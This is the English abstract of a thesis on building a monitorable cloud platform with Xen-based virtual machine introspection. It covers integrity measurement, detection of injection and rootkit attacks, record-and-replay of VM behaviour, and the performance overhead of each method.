| With the continuous development of cloud computing, cloud security problem is becoming more and more important.While cloud computing benefits for tenants and the general users, it also incurs security issues. The security issues will not only threaten the interests of all parties, but also impede the promotion of cloud computing. Under the cloud computing environment, the threat may come from two aspects, one is the service provider, and the other is ordinary users. The multi-tenancy characteristic of cloud computing may introduce untrusted tenants, which will use cloud platform to provide fake services, such as phishing site, to steal the user’s privacy information or account information. Once the user access to these services, he or she is about to reveal personal information to a malicious tenant. The Internet has a large number of unknown users, in which there exists malicious user. They could attack the tenant services, posing a security risk. The attacker will attack tenant services through various means, such as exploiting the vulnerability which was not found by tenant. In successful invasion of tenant’s system, the attacker runs malicious programs in the environment of the tenant, deletes or modifies some important documents, etc. More dangerous situation is that the attacker uses the tenant’s service to do evil, such as using the tenant’s mail service to send spam. Infrastructure cloud provides virtualization service, and from the perspective of the scalability of the cloud platform, if an attacker controls many sets of virtualization server, it is possible for him to launch a large-scale attack, such as DDoS attacks, spreading malicious programs, which will also spread to the end users. Therefore, researching how to build a service monitoring-oriented controllable cloud is necessary.Cloud service providers have the highest control of the cloud platform. They would not want their platform is under malicious attacks, also would not want platform is used to do evil. So effective methods are needed to build a controlled cloud platform. When the threat happens, the cloud service provider is able to respond in time. Virtualization technology is the core technology of infrastructure cloud computing, and tenant services reside in a virtual machine. An effective monitoring method is to use Virtual Machine Introspection (VMI) to monitor service. The service here is generalized service, which can refer to services provided by cloud service providers, can also refer to the services provided by service providers. Because whatever the service is, it is running in a virtual machine in the end. Monitoring virtual machine is to prevent the tenant or the user run malicious code in the cloud. This thesis adopted the method of virtual machine introspection for service monitoring.This thesis studies the virtual machine introspection technology based on Linux and the infrastructure cloud environment. The environment can meet the requirements of different Linux host operating system, and the virtual machine operating system is mainly oriented to Linux and Windows. Using Xen virtual machine monitor as the research object, this thesis analyzed and designed the virtual machine monitoring architecture, including the different monitoring granularity, such as the process monitoring, module monitoring, memory operation monitoring and other virtual machine status monitoring. Process monitoring needs to be able to display process number, process name and process related information. Module monitoring needs to be able to display module name and module related information. Memory operation monitoring needs to be able to display memory page read and write operations. Other virtual machine status monitoring needs to be able to display information such as virtual processor state. The output monitoring content is displayed in proper expression form, at the same time it is stored in the disk as log. Logging operation will not cause much effect on the virtual machine. This thesis tests monitoring software, including performance test, such as time consuming, and effectiveness test, such as the accuracy of the monitoring, and carries on the theoretical analysis. The virtual machine monitor and the monitor software is integrated into infrastructure cloud platform, implementing the service monitoring-oriented controllable cloud platform prototype system, which can be deployed in actual environment.The research content of this thesis mainly focuses on the virtual machine introspection technology, which monitors the virtual machine from outside of the virtual machine. Compared with traditional monitoring methods, the characteristics and novelty is listed below.Monitor software is not susceptible to attack. Traditional service monitoring is mostly based on host, which usually installs the monitor software in the monitored operating system. If a malicious tenants and users gain the control of the system, then the monitor software is exposed to unsafe environment, which is easily discovered by the tenants or users. In this situation, destroying the monitor software is relatively easier. And if the monitor software is installed outside of the virtual machine, then it is not easily found by the attacker. Because virtual machine monitor isolates virtual machines into different domains, each virtual machine runs in its own domain, which will not affect each other. Even if the attacker has destroyed the virtual machine operating system, it is not easy for him to damage monitor software, and much less threaten the entire cloud platform.For inside the virtual machine, monitoring is completely transparent. Because the monitor software is outside the virtual machine, and there is no need to modify the virtual machine operating system, the program running in virtual machine just like on a physical machine. Monitor software uses the interface provided by virtual machine monitor to get the information in virtual machine, not affecting the operation of the internal programs in virtual machine. Due to the isolation provided by virtual machine monitor, programs in virtual machine will not affect the monitor program.Data gained from monitoring can provide more accurate evidence for the digital forensics. An important means of digital forensics is to obtain the system memory image, which can reflect the whole running state of the machine. In traditional monitoring methods, the operation of the monitor software needs to take up memory space, so the obtained image also contains the information of monitor software. The virtual machine introspection monitoring method is to monitor virtual machine from outside of virtual machine, whose memory is used independently by itself. So in the obtained image there will only exists the virtual machine internal information, and there will no exists other irrelevant information.Monitoring content uses a variety of monitoring granularity. Among current monitoring study the monitoring content is single, which only focused on one aspect of monitoring, such as only monitoring process. This monitoring method doesn’t connect a series of related actions, which is bad for reasoning the service behavior. This thesis combines the process monitoring, module monitoring, memory operation monitoring, etc., as completely as possible to replay service events.There is no need to do much modification to virtual machine monitor. Most of the research of virtual machine monitoring has a lot of changes to virtual machine monitor itself. This changes depend on the virtual machine monitor too heavily, which will not be conducive to upgrade the virtual machine monitor. So the research of this thesis don’t need to do too much change to virtual machine monitor, but use the interface provided by virtual machine monitor itself, to maintain low coupling.This thesis studies the related key technologies on construction of service monitoring-oriented controled cloud. The specific work of this thesis mainly has several aspects as following.This thesis makes the integrity measurement of virtual machine runtime environment. The method of testing program or file if it has been tampered with is conducted by integrity. The traditional integrity measurement method is to install the measurement software in the measured system. When a program or file is loaded into the memory, it will be measured by the integrity measurement software. But once an attacker intrude the system successfully, he could undermine the integrity measurement software in the system. To address this problem, this thesis proposed the integrity measurement method based on virtual machine introspection, which makes integrity measurement of application in virtual machine from outside of the virtual machine, achieving the isolation of measurement software from the measured system. And this method uses a scanning way, which is different from the method of system call interception, avoiding to bring a large performance overhead. The experimental results show that the method in terms of performance is superior to the method of system call interception. In the UnixBench experiment, the Execl Throughput overhead, Process Creation overhead and Shell Scripts (8 concurrent) overhead introduced are 0.22%, 3.62%,1.30%, respectively, which are lower than the overhead introduced by HIMA.This thesis detects non-tampering attack in the virtual machine. Integrity measurement can detect whether the program have been tampered with, but there are some of the attacks that don’t not tamper with the program. This thesis studies this kind of non-tampering attacks, specific to the binary code injection attacks, data manipulation attacks, command injection attacks, and designs the detection methods of this kind of attacks. For binary code injection, this thesis uses the system call detection method. For the data manipulation, this thesis uses the memory write operation monitoring method. For the command injection, this thesis uses special string scanning method. The experimental results show that these methods can effectively detect the non-tampering attacks, and the introduced performance cost is low. For example, in the database test, the overhead introduced by system call monitoring is lower than 2%, and the overhdad introduced by data write monitoring is lower than 3%.This thesis records and replays the behavior of the virtual machine. Malware analysis methods put suspicious software into the analysis system, by way of fine-grained monitoring to record the behavior of the malware, such as system call level recording, instruction level recording. But for some behavior which contains non-deterministic events, this analysis method is not precise enough. This thesis designs the record and replay architecture of virtual machine behavior, combined with hardware virtualization functions, avoiding to use dynamic binary translation in terms of performance cost. Record software is set in the virtual machine monitor, in order to reduce the frequent system switch in terms of performance cost. When recording, the architecture only records the required information and non-deterministic events for replay, and don’t record deterministic events. The experimental results show that the method of this thesis can record and replay I/O event, and introduced cost of the performance test is low. In the UnixBench experiment, the whole performance overhead introduced during the logging procedure is very low. Two highest overhead tests are Execl Throughput and Process Creation, which introduced overhead 2.55% and 2.62%, respectively.This thesis detects the status of distributed virtual machines. Rootkit attack enables the attacker to hide in the system, and install the back door in the system. The attacker uses a Rootkit to modify the kernel data, posing a serious threat to the system. In addition, cloud platform has the character of large scalability, running many virtual servers. Single detection methods can’t satisfy the mass detection demand, so there needs a unified platform to monitor the services of cloud platform. The dispersion of log data is also unfavorable to intuitively analysis. To solve above problems, this thesis designs a distributed virtual machine state detection architecture, and the data recorded by each physical node is sent to unified data analysis platform. For logging, this thesis designs user mode logger and kernel mode logger respectively.
|
PDF Full Text Request